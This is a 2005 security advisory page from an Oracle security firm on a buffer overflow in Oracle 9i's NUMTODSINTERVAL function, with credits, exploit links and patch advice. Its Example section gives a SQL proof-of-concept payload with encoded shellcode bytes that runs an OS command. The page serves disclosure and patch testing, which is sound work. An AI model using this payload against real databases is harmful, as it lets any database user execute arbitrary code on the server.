Red-Database-Security GmbH is specialized in Oracle Security

Products
Repscan 2.5
Hedgehog Enterprise
Checkpwd (free)

Services
Oracle Audit / Hardening
Security Training
Consulting

Information
Oracle Security Blog
Published Alerts
Upcoming Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts

News & Events
Events
News

Company
Contact
People
Partner
Impressum
Sitemap


Search



Search Red-Database-Security
Buffer Overflow in NUMTODSINTERVAL in Oracle 9i

Name Buffer Overflow Oracle NUMTODSINTERVAL in Oracle 9i (up to 9.2.0.3)
Systems Affected Oracle 9i
Severity High Risk
Category Buffer Overflow
Vendor URL http://www.oracle.com/
Credit Cesar Cerrudo (<argeniss>dot<com>) / Mark Litchfield (<mark at ngssoftware.com>)
Exploit http://lists.grok.org.uk/pipermail/full-disclosure/2004-February/016789.html
Exploit http://www.ngssoftware.com/advisories/ora_numtodsinterval.txt
Date 14 May 2005 (V 1.00)

Details

Buffer Overflow in NUMTODSINTERVAL. Every database user can exploit this vulnerability and execute arbitrary code. This vulnerability can be exploited via SQL Injection



Example
SELECT NUMTODSINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR'||chr(59)|| chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)||chr(18)||chr(80)||chr(255)||chr(21)||chr(52)||chr(35)||
chr(1 48)||chr(01)||chr(255)||chr(37)||chr(172)||chr(33)||chr(148)||chr(01)|| chr(32)||'echo ARE YOU SURE? >c:\Unbreakable.txt')
FROM DUAL;




Patch Information
Apply Oracle patchset 9.2.0.4 or later.



2005 by Red-Database-Security GmbH - last update 02-nov-2005

Definition Exploit
An exploit is a common term in the computer security to refer to a piece of software that take advantage of a bug or vulnerability leading to a privilege escalation or d.o.s. on a computer system.
Computer security experts are using exploit code to test if a patch is working properly.